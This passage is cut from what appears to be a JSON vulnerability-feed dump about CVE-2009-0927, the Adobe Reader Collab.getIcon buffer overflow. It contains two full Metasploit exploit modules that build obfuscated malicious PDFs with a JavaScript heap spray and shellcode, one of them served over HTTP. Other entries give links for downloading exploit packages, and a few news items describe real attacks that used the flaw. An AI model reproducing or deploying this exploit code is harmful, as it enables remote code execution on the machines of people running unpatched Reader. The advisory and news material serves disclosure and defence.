=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 - reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = \"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16681/"}, {"lastseen": "2016-02-01T10:54:49", "bulletinFamily": "exploit", "description": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit. Local exploit for windows platform", "modified": "2009-09-03T00:00:00", "published": "2009-09-03T00:00:00", "id": "EDB-ID:9579", "href": "https://www.exploit-db.com/exploits/9579/", "type": "exploitdb", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "sourceData": "#!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9579.zip (2009-CVE-2009-0927_package.zip)\r\n\r\n# milw0rm.com [2009-09-03]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9579/"}, {"lastseen": "2016-02-02T00:14:37", "bulletinFamily": "exploit", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16606", "href": "https://www.exploit-db.com/exploits/16606/", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "sourceData": "##\r\n# $Id: adobe_geticon.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\r\n\t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 - reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = \"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\r\n\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16606/"}, {"lastseen": "2016-02-01T07:43:15", "bulletinFamily": "exploit", "description": "Adobe Acrobat Reader 8.1.2 \u2013 9.0 getIcon() Memory Corruption Exploit. CVE-2009-0927. Local exploit for windows platform", "modified": "2009-05-04T00:00:00", "published": "2009-05-04T00:00:00", "id": "EDB-ID:8595", "href": "https://www.exploit-db.com/exploits/8595/", "type": "exploitdb", "title": "Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon Memory Corruption Exploit", "sourceData": "Affected Version : Acrobat Reader 8.1.2 - 9.0\r\nVendor Patch : http://www.adobe.com/support/security/bulletins/apsb09-04.html\r\nTested On : XP SP2 / SP3\r\n\r\nfrom ZDI : http://www.zerodayinitiative.com/advisories/ZDI-09-014/\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\r\nof Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a\r\nmalicious web site or open a malicious file.The specific flaw exists when processing malicious\r\nJavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon()\r\nmethod of a Collab object, proper bounds checking is not performed resulting in a stack overflow.\r\nIf successfully exploited full control of the affected machine running under the credentials of the\r\ncurrently logged in user can be achieved.\r\n\r\nThis vulnerability was discovered by:\r\n\r\nTenable Network Security (there is a man named Nicolas Pouvesle and we know == > he has lots of exploitation method ; ))\r\n\r\nExploit By : www.Abysssec.com\r\n\r\nnote : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode .\r\n\r\nExploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf\r\nMirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf)\r\n\r\n# milw0rm.com [2009-05-04]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8595/"}], "seebug": [{"lastseen": "2017-11-19T18:37:59", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12196", "id": "SSV:12196", "title": "Adobe Acrobat/Reader &lt; 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nback: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12196"}, {"lastseen": "2017-11-19T14:03:09", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66863", "id": "SSV:66863", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttp://exploit-db.com/sploits/2009-CVE-2009-0927_package.zip\r\n\r\n# milw0rm.com [2009-09-03]\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66863"}], "threatpost": [{"lastseen": "2018-10-06T23:02:16", "bulletinFamily": "info", "description": "[](<https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/>)FireEye reported today it had detected a new critical PDF attack targeting the aviation defense industry. Malware Page exploits a [stack-based buffer overflow vulnerability in Adobe Acrobat and Adobe Reader](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). An attacker would be able to execute code remotely via a crafted argument to the getIcon method of a Collab object, according to the CVE alert.\n\nWhen a user opens the infected PDF, the exploit creates an executable file, which drops a DLL and opens a backdoor connection on TCP port 49163, FireEye said in its analysis. The malware opens connections to IP addresses in Germany and the Bahamas and maintains a detailed log of all network communications. \nSimultaneously, the attack drops a decoy PDF document which is an invitation to an actual defense industry event.\n", "modified": "2013-04-17T16:31:34", "published": "2012-09-13T19:46:42", "id": "THREATPOST:1B37290C48B43298A5C4751356F68B70", "href": "https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/77011/", "type": "threatpost", "title": "New PDF Attack Targets Aviation Defense Industry", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "modified": "2013-05-09T20:01:56", "published": "2013-05-07T12:58:12", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:51", "bulletinFamily": "info", "description": "[](<https://threatpost.com/main-php-nuke-site-compromised-050710/>)The main site for the PHP-Nuke content management system software has been compromised and is serving malicious iFrame exploits to visitors. \n\nResearchers at [Websense](<http://community.websense.com/blogs/securitylabs/archive/2010/05/07/phpnuke-org-has-been-compromised.aspx>) found that the phpnuke.org site is currently serving several different exploits. The attack uses the common iFrame-redirection technique to hijack users\u2019 browsers and send them off to a malicious site. The code on that site is highly obfuscated and contains exploits for three separate vulnerabilities, two in Internet Explorer and one in Adobe Reader.\n\nThe first attack tries to exploit a four-year-old flaw in Internet Explorer. If that part of the attack works, it downloads a Trojan onto the victim\u2019s machine. The malware then tries to connect to several Web sites, the researchers said. \n\n\n\nThe second attack uses a Java exploit, which ends up with the same infection routine as the first one. \n\nThe third exploit is a PDF exploit \u2014 this actually merges three \nexploits targeting Adobe Reader. First the JavaScript in the HTML page \nchecks if Adobe Reader is exploitable by checking its version number. \nThe version should be between 7 and 7.1.4, 8 and 8.1.7, or 9 and 9.4. \nWhen a vulnerable version is found, the exploit downloads the malicious \nPDF file and as it is loaded by Adobe Reader, the malicious ActionScript \nin the file is executed automatically. The PDF itself contains an \nobfuscated ActionScript that utilizes one of the three different PDF \nexploits it hides. These are [CVE-2009-4324](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324>), \n[CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>), \nand [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). \nIf it succeeds, the download and installation of 